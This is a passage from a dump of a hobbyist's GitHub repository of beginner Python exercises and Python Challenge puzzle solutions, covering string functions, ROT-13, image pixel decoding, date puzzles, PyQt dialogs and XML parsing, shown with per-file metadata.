maxlength, wordlist))\n\n\n# Write a version of a palindrome recognizer that also accepts phrase palindromes such as \"Go hang a salami I'm a\n# lasagna hog.\", \"Was it a rat I saw?\", \"Step on no pets\", \"Sit on a potato pan, Otis\", \"Lisa Bonet ate no basil\",\n# \"Satan, oscillate my metallic sonatas\", \"I roamed under it as a tired nude Maori\", \"Rise to vote sir\", or the\n# exclamation \"Dammit, I'm mad!\". Note that punctuation, capitalization, and spacing are usually ignored.\ndef is_palindrome_phrase(phrase):\n rx = re.compile(\"[a-z]\", re.IGNORECASE)\n r = ''.join(rx.findall(phrase)).lower()\n return is_palindrome(r)\n\n\n# A pangram is a sentence that contains all the letters of the English alphabet at least once, for example:\n# The quick brown fox jumps over the lazy dog. Your task here is to write a function to check a sentence to\n# see if it is a pangram or not.\ndef is_pangram(phrase):\n rx = re.compile(\"[a-z]\", re.IGNORECASE)\n letters = set(rx.findall(phrase.lower()))\n return len(letters) == 26\n\n\n# \"99 Bottles of Beer\" is a traditional song in the United States and Canada. It is popular to sing on long trips,\n# as it has a very repetitive format which is easy to memorize, and can take a long time to sing.\n# The song's simple lyrics are as follows:\n#\n# 99 bottles of beer on the wall, 99 bottles of beer.\n# Take one down, pass it around, 98 bottles of beer on the wall.\n#\n# The same verse is repeated, each time with one fewer bottle.\n# The song is completed when the singer or singers reach zero.\n#\n# Your task here is write a Python program capable of generating all the verses of the song.\ndef get_99btls_lyrics(starting_number):\n lyric_template = \"%d bottles of beer on the wall, %d bottles of beer.\\nTake one down, pass it around, %d bottles of beer on the wall.\\n\\n\"\n finalResult = \"\"\n for x in range(starting_number, 0, -1):\n finalResult += lyric_template % (x, x, x - 1)\n return finalResult\n\n\n# Represent a small bilingual lexicon as a Python dictionary in the following fashion\n# {\"merry\":\"god\", \"christmas\":\"jul\", \"and\":\"och\", \"happy\":gott\", \"new\":\"nytt\", \"year\":\"år\"}\n# and use it to translate your Christmas cards from English into Swedish.\n# That is, write a function translate() that takes a list of English words and returns a list of Swedish words.\ndef translate_swede(phrase):\n swede_dict = {\"merry\": \"god\", \"christmas\": \"jul\", \"and\": \"och\", \"happy\": \"gott\", \"new\": \"nytt\", \"year\": \"år\"}\n response = \"\"\n for x in str(phrase).split(\" \"):\n response += swede_dict[x.lower()] + \" \"\n return response\n\n\n# Write a function char_freq() that takes a string and builds a frequency listing of the characters contained in it.\n# Represent the frequency listing as a Python dictionary.\n# Try it with something like char_freq(\"abbabcbdbabdbdbabababcbcbab\").\ndef char_freq(phrase):\n freq_dict = {}\n for x in phrase:\n if x not in freq_dict.keys():\n freq_dict[x] = 1\n else:\n freq_dict[x] += 1\n return freq_dict\n\n\n# In cryptography, a Caesar cipher is a very simple encryption techniques in which each letter in the plain text is\n# replaced by a letter some fixed number of positions down the alphabet. For example, with a shift of 3,\n# A would be replaced by D, B would become E, and so on. The method is named after Julius Caesar,\n# who used it to communicate with his generals. ROT-13 (\"rotate by 13 places\") is a widely used example of a Caesar\n# cipher where the shift is 13. In Python, the key for ROT-13 may be represented by means of the following dictionary:\n#\n# key = {'a':'n', 'b':'o', 'c':'p', 'd':'q', 'e':'r', 'f':'s', 'g':'t', 'h':'u',\n# 'i':'v', 'j':'w', 'k':'x', 'l':'y', 'm':'z', 'n':'a', 'o':'b', 'p':'c',\n# 'q':'d', 'r':'e', 's':'f', 't':'g', 'u':'h', 'v':'i', 'w':'j', 'x':'k',\n# 'y':'l', 'z':'m', 'A':'N', 'B':'O', 'C':'P', 'D':'Q', 'E':'R', 'F':'S',\n# 'G':'T', 'H':'U', 'I':'V', 'J':'W', 'K':'X', 'L':'Y', 'M':'Z', 'N':'A',\n# 'O':'B', 'P':'C', 'Q':'D', 'R':'E', 'S':'F', 'T':'G', 'U':'H', 'V':'I',\n# 'W':'J', 'X':'K', 'Y':'L', 'Z':'M'}\n# Your task in this exercise is to implement an encoder/decoder of ROT-13. Once you're done, you will be able to read\n# the following secret message:\n#\n# Pnrfne pvcure? V zhpu cersre Pnrfne fnynq!\n# Note that since English has 26 characters, your ROT-13 program will be able to both encode and decode texts written\n# in English.\ndef caesar_cipher(phrase):\n key = {'a': 'n', 'b': 'o', 'c': 'p', 'd': 'q', 'e': 'r', 'f': 's', 'g': 't', 'h': 'u',\n 'i': 'v', 'j': 'w', 'k': 'x', 'l': 'y', 'm': 'z', 'n': 'a', 'o': 'b', 'p': 'c',\n 'q': 'd', 'r': 'e', 's': 'f', 't': 'g', 'u': 'h', 'v': 'i', 'w': 'j', 'x': 'k',\n 'y': 'l', 'z': 'm', 'A': 'N', 'B': 'O', 'C': 'P', 'D': 'Q', 'E': 'R', 'F': 'S',\n 'G': 'T', 'H': 'U', 'I': 'V', 'J': 'W', 'K': 'X', 'L': 'Y', 'M': 'Z', 'N': 'A',\n 'O': 'B', 'P': 'C', 'Q': 'D', 'R': 'E', 'S': 'F', 'T': 'G', 'U': 'H', 'V': 'I',\n 'W': 'J', 'X': 'K', 'Y': 'L', 'Z': 'M'}\n result = \"\"\n for x in phrase:\n if x in key.keys():\n result += key[x]\n else:\n result += x\n return result\n\n\n# Define a simple \"spelling correction\" function correct() that takes a string and sees to it that 1) two or more\n# occurrences of the space character is compressed into one, and 2) inserts an extra space after a period if the\n# period is directly followed by a letter. E.g. correct(\"This is very funny and cool.Indeed!\") should return\n# \"This is very funny and cool. Indeed!\" Tip: Use regular expressions!\ndef correct(phrase):\n multispace_regex = re.compile(\"\\s{2,}\").findall(phrase)\n nospace_regex = re.compile(\"(\\w.*)([.])(\\w.*)\")\n for x in multispace_regex:\n phrase = phrase.replace(x, ' ')\n\n r = nospace_regex.split(phrase)\n phrase = \"\"\n for x in r:\n if x == \".\":\n phrase += x + \" \"\n else:\n phrase += x\n return phrase\n\n# The third person singular verb form in English is distinguished by the suffix -s,\n# which is added to the stem of the infinitive form: run -> runs. A simple set of rules can be given as follows:\n#\n# If the verb ends in y, remove it and add ies\n# If the verb ends in o, ch, s, sh, x or z, add es\n# By default just add s\n#\n# Your task in this exercise is to define a function make_3sg_form() which given a verb in infinitive form returns\n# its third person singular form. Test your function with words like try, brush, run and fix. Note however that the\n# rules must be regarded as heuristic, in the sense that you must not expect them to work for all cases.\n# Tip: Check out the string method endswith().\ndef make_3sg_form(verb):\n other_ends = [\"o\", \"ch\", \"s\", \"sh\", \"x\", \"z\"]\n if str(verb).endswith(\"y\"):\n verb = verb[0: -1] + \"ies\"\n return verb\n elif list((True for x in other_ends if verb.endswith(x))):\n verb = list((verb + \"es\" for x in other_ends if verb.endswith(x)))[0]\n return verb\n else:\n verb += \"s\"\n return verb\n\n\n# In English, the present participle is formed by adding the suffix -ing to the infinite form: go -> going.\n# A simple set of heuristic rules can be given as follows:\n#\n#If the verb ends in e, drop the e and add ing (if not exception: be, see, flee, knee, etc.)\n#If the verb ends in ie, change ie to y and add ing\n#For words consisting of consonant-vowel-consonant, double the final letter before adding ing\n#By default just add ing\n#\n#Your task in this exercise is to define a function make_ing_form() which given a verb in infinitive form returns\n# its present participle form. Test your function with words such as lie, see, move and hug. However,\n# you must not expect such simple rules to work for all cases.\ndef make_ing_form(verb):\n cvc_regex = re.compile(\"[^aeiou][aeiou][^aeiou]\", re.IGNORECASE)\n if str(verb).endswith(\"ie\"):\n verb = verb[0:-2] + 'ying'\n elif str(verb).endswith(\"e\"):\n if str(verb).endswith(\"ee\") or len(verb) < 3:\n verb += \"ing\"\n else:\n verb = verb[:-1] + \"ing\"\n elif cvc_regex.search(verb[-3:]):\n verb = verb + verb[-1] + \"ing\"\n else:\n verb += \"ing\"\n return verb"
},
{
"alpha_fraction": 0.5291005373001099,
"alphanum_fraction": 0.7063491940498352,
"avg_line_length": 28.153846740722656,
"blob_id": "f28b5392b256c7a1b27f93b206530b0915d90c4c",
"content_id": "3ca05ed96e1ddfa92d04ceed8be629321ded4f86",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 378,
"license_type": "no_license",
"max_line_length": 117,
"num_lines": 13,
"path": "/PythonChallenges/8.py",
"repo_name": "cansley/PythonProjects",
"src_encoding": "UTF-8",
"text": "__author__ = 'cxa70'\n\nimport bz2\n\n# bzip extract these values\nusername = b'BZh91AY&SYA\\xaf\\x82\\r\\x00\\x00\\x01\\x01\\x80\\x02\\xc0\\x02\\x00 \\x00!\\x9ah3M\\x07<]\\xc9\\x14\\xe1BA\\x06\\xbe\\x084'\npassword = b'BZh91AY&SY\\x94$|\\x0e\\x00\\x00\\x00\\x81\\x00\\x03$ \\x00!\\x9ah3M\\x13<]\\xc9\\x14\\xe1BBP\\x91\\xf08'\n\nu = bz2.decompress(username).decode('utf-8')\np = bz2.decompress(password).decode('utf-8')\n\nprint(u)\nprint(p)"
},
{
"alpha_fraction": 0.5787278413772583,
"alphanum_fraction": 0.6246089935302734,
"avg_line_length": 24.210525512695312,
"blob_id": "e9bfa7958aebbe7dd95d047f9b17301846e6b816",
"content_id": "9828c1cf10d7c51fcf35c2103f9c81a5c1225c24",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 959,
"license_type": "no_license",
"max_line_length": 84,
"num_lines": 38,
"path": "/PythonChallenges/10.py",
"repo_name": "cansley/PythonProjects",
"src_encoding": "UTF-8",
"text": "__author__ = 'cxa70'\n\nimport string\n\na = [1, 11, 21, 1211, 111221, ] # Dafuq does this even mean?\n# after the first value, the number represents a description of the value before it.\n# example: 1 = one 1 or 11. 11 = two 1 or 21, 21 = one 2 one 1 or 1211, etc.\ndef transformCharacterCount(char, count):\n assert isinstance(char, str)\n return str(count)+str(char)\n\n\ntestValue = \"1\"\nmasterList = [testValue, ]\n\nrunCount = 0\n\nwhile runCount <= 30:\n evalChar = \"\"\n outputValue = \"\"\n charCount = 0\n for char in testValue:\n if evalChar == \"\":\n evalChar = char\n\n if evalChar == char:\n charCount += 1\n else:\n outputValue += transformCharacterCount(evalChar, charCount)\n evalChar = char\n charCount = 1\n\n outputValue += transformCharacterCount(evalChar, charCount)\n testValue = outputValue\n masterList.append(testValue)\n runCount += 1\n\nprint(len(masterList[30]))\n\n"
},
{
"alpha_fraction": 0.6451612710952759,
"alphanum_fraction": 0.6666666865348816,
"avg_line_length": 17.799999237060547,
"blob_id": "f5338f0cc73d68826dd4c6a759e45895b2c8305b",
"content_id": "86637a16af3e1efc1908b4a5ec96ff9951e36dfd",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 93,
"license_type": "no_license",
"max_line_length": 52,
"num_lines": 5,
"path": "/PythonChallenges/13.py",
"repo_name": "cansley/PythonProjects",
"src_encoding": "UTF-8",
"text": "__author__ = 'cxa70'\n\n\n#fuck this. something to do with XML-RPC service....\n#answer is: italy"
},
{
"alpha_fraction": 0.5816733241081238,
"alphanum_fraction": 0.5936254858970642,
"avg_line_length": 19.91666603088379,
"blob_id": "252968e0844d6ab9d921d081c656da58634bdaf1",
"content_id": "88dd321082ce3ab618e6aae63f58cbf0d727c602",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1004,
"license_type": "no_license",
"max_line_length": 64,
"num_lines": 48,
"path": "/HeadFirstPython/main.py",
"repo_name": "cansley/PythonProjects",
"src_encoding": "UTF-8",
"text": "__author__ = 'cxa70'\n\nimport Ch1\nimport xml.etree.cElementTree as et\nimport sqlite3 as sql\nimport XmlNode\n\n\ndef showElements(element, indent, is_root):\n sz = len(element)\n ind = indent\n if is_root:\n ind = 0\n if sz > 0:\n print(\" \"*ind + \"Name: \" + element.tag)\n for ele in element:\n showElements(ele, indent*2, False)\n else:\n print(\" \"*indent + element.tag + \": \" + element.text)\n\n\ndef print_sections(section, indent):\n idt = indent\n if section.IsRoot:\n idt = 0\n\n print(\" \"*idt + section.Name + \"(\" + section.Value + \")\")\n\n if section.has_values():\n for val in section.Values:\n print(\" \"*indent*2 + val.Name + \": \" + val.Value)\n\n if section.has_sections():\n for sec in section.Sections:\n print_sections(sec, indent*2)\n\n\n\n\n\nxdoc = et.parse('RRV-CINCToDSHRequestSample1.xml')\nroot = xdoc.getroot()\n\ndoc = XmlNode.Section()\ndoc.IsRoot = True\ndoc.build_from_etree(root)\n\nprint_sections(doc, 2)\n"
},
{
"alpha_fraction": 0.5855130553245544,
"alphanum_fraction": 0.6056337952613831,
"avg_line_length": 18.115385055541992,
"blob_id": "a863f2ca265cc73e5fcc02cafbd89d4972ebcbde",
"content_id": "631538466b46aa4ea4e80cd4900af54721d210b7",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 497,
"license_type": "no_license",
"max_line_length": 38,
"num_lines": 26,
"path": "/PythonChallenges/7.py",
"repo_name": "cansley/PythonProjects",
"src_encoding": "UTF-8",
"text": "__author__ = 'cxa70'\n\nfrom PyQt4.QtCore import *\nfrom PyQt4.QtGui import *\nimport ast\n\napp = QCoreApplication([])\nimage = QImage(\"oxygen.png\")\nimage.size()\nsz = image.size()\ny = sz.height()/2\nval = ''\n\nfor x in range(0, sz.width(), 7):\n px = QColor(image.pixel(x, y))\n val += chr(px.getRgb()[0])\n\nstart_idx = val.find('[')\nend_idx = val.find(']')\nstub = val[start_idx:end_idx+1]\nlvl = ast.literal_eval(stub)\nslvl = \"\"\nfor x in lvl:\n slvl += chr(x)\n\nprint(val[:start_idx-1] + ': ' + slvl)\n"
},
{
"alpha_fraction": 0.633367657661438,
"alphanum_fraction": 0.6704428195953369,
"avg_line_length": 30.354839324951172,
"blob_id": "fb25fc950fb7d222fbb42a64263961ec0fdfdb85",
"content_id": "8933a766e246b884cb7c520ddbb8597afef23931",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 971,
"license_type": "no_license",
"max_line_length": 75,
"num_lines": 31,
"path": "/PythonChallenges/15.py",
"repo_name": "cansley/PythonProjects",
"src_encoding": "UTF-8",
"text": "__author__ = 'cxa70'\n# page displays title of \"whom?\"\n# page shows calendar with Jan-26th circled\n# page shows calendar with 1**6 in the year\n# page source has these hints:\n# he aint the youngest, he's the second\n# todo: buy flowers for tomorrow\n#\n# target date is jan-27th, but what year?\n# Feb on calendar shows 29 days, so its a leap year.\n# Jan 1 is a Thursday...\n\nimport datetime\n\nyear = 2010\nrndDate = datetime.date(year, 3, 1) # lets start with march first...\nrndDate += datetime.timedelta(days=-1)\nwhile rndDate.day != 29:\n year += -1\n rndDate = datetime.date(year, 3, 1) + datetime.timedelta(days=-1)\n\nstartYear = rndDate.year\n\nfor x in range(startYear, 1, -4):\n theDate = datetime.date(x, 1, 1)\n theYear = list(str(theDate.year))\n if theDate.weekday() == 3 and theYear[0] == '1' and theYear[-1] == '6':\n newDate = datetime.date(theDate.year, 1, 27)\n print(newDate)\n\n# from the dates produced, find the birtday (hint: its mozart!)"
},
{
"alpha_fraction": 0.5090751647949219,
"alphanum_fraction": 0.5471045970916748,
"avg_line_length": 37.599998474121094,
"blob_id": "450295e069c345fa8b59f9b8305b04a250fe523c",
"content_id": "f7bbc300d8fc0f046d1fbc5888a871f00678b38f",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1157,
"license_type": "no_license",
"max_line_length": 77,
"num_lines": 30,
"path": "/PythonChallenges/11.py",
"repo_name": "cansley/PythonProjects",
"src_encoding": "UTF-8",
"text": "__author__ = 'cxa70'\n\nfrom PyQt4.QtCore import *\nfrom PyQt4.QtGui import *\n\n# download the image from: http://www.pythonchallenge.com/pc/return/cave.jpg\napp = QCoreApplication([])\noriginal = QImage(\"cave.jpg\")\no_width = original.size().width()\no_height = original.size().height()\nodd = QImage(o_width/2, o_height/2, original.format())\neven = QImage(o_width/2, o_height/2, original.format())\n\nfor x in range(o_width):\n for y in range(o_height):\n if x % 2 == 0 and y % 2 == 0:\n even.setPixel(x/2, y/2, original.pixel(x, y))\n #even.putpixel((x / 2, y / 2), image.getpixel((x, y)))\n elif x % 2 == 0 and y % 2 == 1:\n odd.setPixel(x/2, (y-1)/2, original.pixel(x, y))\n #odd.putpixel((x / 2, (y - 1) / 2), image.getpixel((x, y)))\n elif x % 2 == 1 and y % 2 == 0:\n even.setPixel((x-1)/2, y/2, original.pixel(x, y))\n #even.putpixel(((x - 1) / 2, y / 2), image.getpixel((x, y)))\n else:\n odd.setPixel((x-1)/2, (y-1)/2, original.pixel(x, y))\n #odd.putpixel(((x - 1) / 2, (y - 1) / 2), image.getpixel((x, y)))\n\neven.save(\"even.jpg\")\nodd.save(\"odd.jpg\")"
},
{
"alpha_fraction": 0.45910781621932983,
"alphanum_fraction": 0.4758364260196686,
"avg_line_length": 18.962963104248047,
"blob_id": "cc6c8a1124494767396288128d8fbba050cfb003",
"content_id": "74415bbcbd8b0c8e87066178f59bfcfdb5bfc3f7",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 538,
"license_type": "no_license",
"max_line_length": 50,
"num_lines": 27,
"path": "/MyFirstPython/test.py",
"repo_name": "cansley/PythonProjects",
"src_encoding": "UTF-8",
"text": "__author__ = 'cxa70'\n\nimport string\n\ngarbledText = \"map\"\ncleanedText = \"\"\ncharacterCode = {\"k\": \"m\",\n \"o\": \"q\",\n \"e\": \"g\",\n \"g\": \"i\"}\n\nfor char in garbledText:\n if string.ascii_lowercase.__contains__(char):\n idx = string.ascii_lowercase.index(char)\n if idx == 24:\n idx = 0\n elif idx == 25:\n idx = 1\n else:\n idx += 2\n\n cleanedText += string.ascii_lowercase[idx]\n else:\n cleanedText += char\n\n\nprint(cleanedText)"
},
{
"alpha_fraction": 0.6504064798355103,
"alphanum_fraction": 0.7154471278190613,
"avg_line_length": 19.66666603088379,
"blob_id": "5117abb352d01fcad8d42b38ff5a53d9c940d5f0",
"content_id": "086f8e7a323741e9a7d295aa64a9a00a5ea4d012",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 123,
"license_type": "no_license",
"max_line_length": 75,
"num_lines": 6,
"path": "/PythonChallenges/0.py",
"repo_name": "cansley/PythonProjects",
"src_encoding": "UTF-8",
"text": "__author__ = 'cxa70'\n#calculate 2^38 and use the result in the url to move to the next challenge\n\nimport math\n\nprint(2**38)"
},
{
"alpha_fraction": 0.6317829489707947,
"alphanum_fraction": 0.6472868323326111,
"avg_line_length": 17.5,
"blob_id": "08ab6be88c228b6a2aa4e86936db879487c67844",
"content_id": "f66f744b82888cc0b72a291b7d7303adf85c2e20",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 258,
"license_type": "no_license",
"max_line_length": 46,
"num_lines": 14,
"path": "/PythonChallenges/5.py",
"repo_name": "cansley/PythonProjects",
"src_encoding": "UTF-8",
"text": "__author__ = 'cxa70'\n\nimport pickle\npk = pickle.Unpickler(open(\"banner.p\", \"rb\"))\n\nwtfAmI = pk.load()\nstringThing = \"\"\nfor thing in wtfAmI:\n for subThing in thing:\n stringThing += subThing[0]*subThing[1]\n\n stringThing += \"\\n\"\n\nprint(stringThing)"
},
{
"alpha_fraction": 0.7666666507720947,
"alphanum_fraction": 0.7666666507720947,
"avg_line_length": 30,
"blob_id": "cf6f48deae00a6f64c053af6d999d620513c7547",
"content_id": "e0015a7e5950ef74319fdbf8b67c1148b63b0c60",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Text",
"length_bytes": 30,
"license_type": "no_license",
"max_line_length": 30,
"num_lines": 1,
"path": "/HeadFirstPython/readme.txt",
"repo_name": "cansley/PythonProjects",
"src_encoding": "UTF-8",
"text": "Nothing of note here...really."
},
{
"alpha_fraction": 0.4883720874786377,
"alphanum_fraction": 0.49435216188430786,
"avg_line_length": 24.100000381469727,
"blob_id": "ee9a169f2692fea491057bec565877c5b55ca2e8",
"content_id": "86e5471ed15a195d49b19942f779a8a854e0b3d4",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1505,
"license_type": "no_license",
"max_line_length": 47,
"num_lines": 60,
"path": "/HeadFirstPython/XmlNode.py",
"repo_name": "cansley/PythonProjects",
"src_encoding": "UTF-8",
"text": "__author__ = 'cxa70'\nimport re\n\nclass Section:\n def __init__(self):\n self.Sections = []\n self.Values = []\n self.Attributes = []\n self.IsRoot = False\n self.Name = \"\"\n self.Value = \"\"\n self.Namespace = \"\"\n\n def has_sections(self):\n return len(self.Sections) > 0\n\n def has_values(self):\n return len(self.Values) > 0\n\n def _build_attribs(self, attribs):\n for attrib in attribs.keys():\n new_attrib = Attribute()\n new_attrib.Name = attrib\n new_attrib.Value = attribs[attrib]\n self.Attributes.append(new_attrib)\n\n def build_from_etree(self, etree):\n regex = re.compile(\"{(.*)}(.*)\")\n r = regex.search(etree.tag)\n if len(r.groups()) > 0:\n self.Name = r.groups()[1]\n self.Namespace = r.groups()[0]\n else:\n self.Name = etree.tag.strip()\n\n self.Value = etree.text.strip()\n if len(etree.attrib) > 0:\n self._build_attribs(etree.attrib)\n\n if len(etree) > 0:\n for ele in etree:\n child = Section()\n child.build_from_etree(ele)\n if child.has_values():\n self.Sections.append(child)\n else:\n self.Values.append(child)\n\n\n\nclass Value:\n def __init__(self):\n self.Name = \"\"\n self.Value = \"\"\n\n\nclass Attribute:\n def __init__(self):\n self.Name = \"\"\n self.Value = \"\""
},
{
"alpha_fraction": 0.5775862336158752,
"alphanum_fraction": 0.5862069129943848,
"avg_line_length": 18.33333396911621,
"blob_id": "f96621cb8fa478c262bcd7770ef7b31c7e39ae17",
"content_id": "5a3d2f0c0f3dc4be11d680cbb7ce9f14d7183eb5",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 232,
"license_type": "no_license",
"max_line_length": 33,
"num_lines": 12,
"path": "/pluralsight/setup.py",
"repo_name": "cansley/PythonProjects",
"src_encoding": "UTF-8",
"text": "from distutils.core import setup\n\nsetup(\n name='pluralsight',\n version='.09',\n packages=[''],\n url='http://me.com',\n license='GPL',\n author='Charles Ansley',\n author_email='[email protected]',\n description='Some test crap.'\n)\n"
},
{
"alpha_fraction": 0.6297322511672974,
"alphanum_fraction": 0.6352723836898804,
"avg_line_length": 20.254901885986328,
"blob_id": "f50c10fb8611c547f354ddc4b0812b034fa8852f",
"content_id": "64e0c6c60050020aa4296302280494c6f928962c",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1083,
"license_type": "no_license",
"max_line_length": 63,
"num_lines": 51,
"path": "/pluralsight/structure.py",
"repo_name": "cansley/PythonProjects",
"src_encoding": "UTF-8",
"text": "from PyQt4.QtCore import *\nfrom PyQt4.QtGui import *\nfrom PyQt4 import QtGui\nimport sys\nfrom myDiag import Ui_dSomeWindow\nfrom enum import Enum\n\n\nclass Color(Enum):\n Red = 1\n Green = 2\n Blue = 3\n\n\nclass Main(QtGui.QMainWindow):\n def __init__(self):\n QtGui.QMainWindow.__init__(self)\n self.ui = Ui_dSomeWindow()\n self.ui.setupUi(self)\n\n\nclass HelloWorld(QDialog):\n def __init__(self):\n QDialog.__init__(self)\n\n layout = QVBoxLayout()\n\n self.label = QLabel(\"Hello World!\")\n line_edit = QLineEdit()\n button = QPushButton(\"Close\")\n line_edit.setPlaceholderText(\"Enter your text here...\")\n\n layout.addWidget(self.label)\n layout.addWidget(line_edit)\n layout.addWidget(button)\n\n self.setLayout(layout)\n\n button.clicked.connect(self.close)\n line_edit.textChanged.connect(self.change_text_label)\n self.setFocus()\n\n def change_text_label(self, text):\n self.label.setText(text)\n\n\n\napp = QApplication(sys.argv)\ndialog = HelloWorld()\ndialog.show()\napp.exec_()"
},
{
"alpha_fraction": 0.5830945372581482,
"alphanum_fraction": 0.6031518578529358,
"avg_line_length": 23.068965911865234,
"blob_id": "62236d9fa5bb55662ef0919486fe1db86874f65f",
"content_id": "e01c5177028d629f6948a209040a7a8cf83c3904",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 698,
"license_type": "no_license",
"max_line_length": 92,
"num_lines": 29,
"path": "/PythonChallenges/16.py",
"repo_name": "cansley/PythonProjects",
"src_encoding": "UTF-8",
"text": "__author__ = 'cxa70'\n\nfrom PyQt4.QtCore import *\nfrom PyQt4.QtGui import *\n\n# download the image from: http://www.pythonchallenge.com/pc/return/mozart.html : mozart.gif\napp = QCoreApplication([])\nimg = QImage('mozart.gif')\n\nw = img.size().width()\nh = img.size().height()\n\nmagenta = qRgb(255, 0, 255)\nbars = []\nfor y in range(h):\n for x in range(w-5):\n pixel = img.pixel(x, y)\n opixel = img.pixel(x+4, y)\n if pixel == magenta and opixel == magenta:\n bars.append((x, y))\n\nnewImg = QImage(w, h, img.format())\n\nfor y in range(h):\n for x in range(w):\n newImg.setPixel((x + w - bars[y][0]) % w, y, img.pixel(x, y))\n\nnewImg.save(\"newMozart.png\")\nprint('done')\n"
},
{
"alpha_fraction": 0.7368420958518982,
"alphanum_fraction": 0.7719298005104065,
"avg_line_length": 18.33333396911621,
"blob_id": "d53494263300117232853d00aeb0961a615ac354",
"content_id": "b29d1f3868af4631dce79de6b1d7330ce01a3b95",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 57,
"license_type": "no_license",
"max_line_length": 38,
"num_lines": 3,
"path": "/PythonChallenges/misc.py",
"repo_name": "cansley/PythonProjects",
"src_encoding": "UTF-8",
"text": "import subprocess\n\nsubprocess.call(r'python.exe .\\16.py')"
},
{
"alpha_fraction": 0.6702249050140381,
"alphanum_fraction": 0.6744186282157898,
"avg_line_length": 36.485713958740234,
"blob_id": "c85055239b90ecb74bee729a22bde9d057faa37a",
"content_id": "cb931c3d15dd3f959f2a010db8b6c59be3250128",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 2625,
"license_type": "no_license",
"max_line_length": 119,
"num_lines": 70,
"path": "/PythonExercises/highorderfunctions.py",
"repo_name": "cansley/PythonProjects",
"src_encoding": "UTF-8",
"text": "# from functools import reduce\n\n# Using the higher order function reduce(), write a function max_in_list() that takes a list of numbers and returns\n# the largest one. Then ask yourself: why define and call a new function, when I can just as well call the reduce()\n# function directly?\ndef max_in_list(number_list):\n return reduce((lambda x, y: x if (x > y) else y), number_list)\n\n\n# Write a program that maps a list of words into a list of integers representing the lengths of the correponding words.\n# Write it in three different ways: 1) using a for-loop, 2) using the higher order function map(), and 3) using list\n# comprehensions.\ndef map_words(word_list):\n list1 = []\n for x in word_list:\n list1.append(len(x))\n\n list2 = [len(x) for x in word_list]\n\n list3 = list(map(lambda x: len(x), word_list))\n\n return [list1, list2, list3]\n\n\n# Write a function find_longest_word() that takes a list of words and returns the length of the longest one.\n# Use only higher order functions.\ndef find_longest_word(word_list):\n return reduce((lambda x, y: x if (x > y) else y), map(lambda x: len(x), word_list))\n\n\n# Using the higher order function filter(), define a function filter_long_words() that takes a list of words and an\n# integer n and returns the list of words that are longer than n.\ndef filter_long_words(word_list, target_len):\n return list(filter(lambda x: len(x) > target_len, word_list))\n\n\n# Represent a small bilingual lexicon as a Python dictionary in the following fashion {\"merry\":\"god\", \"christmas\":\"jul\"\n# , \"and\":\"och\", \"happy\":gott\", \"new\":\"nytt\", \"year\":\"år\"} and use it to translate your Christmas cards from English\n# into Swedish. Use the higher order function map() to write a function translate() that takes a list of English words\n# and returns a list of Swedish words.\ndef translate(word_list):\n swede_dict = {\"merry\": \"god\", \"christmas\": \"jul\", \"and\": \"och\", \"happy\": \"gott\", \"new\": \"nytt\", \"year\": \"år\"}\n return list(map(lambda x: swede_dict[x], word_list))\n\n\n# Implement the higher order functions map(), filter() and reduce().\n# (They are built-in but writing them yourself may be a good exercise.)\ndef map(func, list):\n newlist = []\n for x in list:\n newlist.append(func(x))\n return newlist\n\n\ndef filter(func, list):\n newlist = []\n for x in list:\n if func(x):\n newlist.append(x)\n return newlist\n\n\ndef reduce(func, list):\n returnval = None\n for i in range(len(list) - 1):\n if not returnval:\n returnval = list[i]\n else:\n returnval = func(returnval, list[i])\n return returnval"
},
{
"alpha_fraction": 0.4285714328289032,
"alphanum_fraction": 0.523809552192688,
"avg_line_length": 20,
"blob_id": "55f5232e3e6e4b1d9aa1e97b384108740cf73d94",
"content_id": "2d5315a4a39f9580426c6c0ea882844b13cd5cfe",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 21,
"license_type": "no_license",
"max_line_length": 20,
"num_lines": 1,
"path": "/HeadFirstPython/Ch1/__init__.py",
"repo_name": "cansley/PythonProjects",
"src_encoding": "UTF-8",
"text": "__author__ = 'cxa70'\n"
},
{
"alpha_fraction": 0.5175315737724304,
"alphanum_fraction": 0.583450198173523,
"avg_line_length": 27.559999465942383,
"blob_id": "4e7c561c022d00a6ebd876a65ab13e48605e828a",
"content_id": "c60bdd6d46884a54e00d8289f29ce867b0e6dc0a",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 713,
"license_type": "no_license",
"max_line_length": 83,
"num_lines": 25,
"path": "/PythonChallenges/14.py",
"repo_name": "cansley/PythonProjects",
"src_encoding": "UTF-8",
